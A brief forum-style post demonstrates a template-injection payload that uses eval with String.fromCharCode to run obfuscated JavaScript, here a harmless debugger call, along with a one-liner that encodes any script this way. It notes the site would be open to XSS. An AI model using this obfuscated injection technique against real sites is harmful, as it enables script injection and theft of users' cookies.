For those wondering
{{eval(String.fromCharCode(40,102,117,110,99,116,105,111,110,40,41,32,123,100,101,98,117,103,103,101,114,59,125,41,40,41))}}
'String.fromCharCode(' + ('(function() {debugger;})()'.split('').map(function(c) { return c.charCodeAt(0) }).join()) + ')'
If this site had a shareable link feature and there were cookies on that domain this would be an xss attack vector.
For those wondering
From: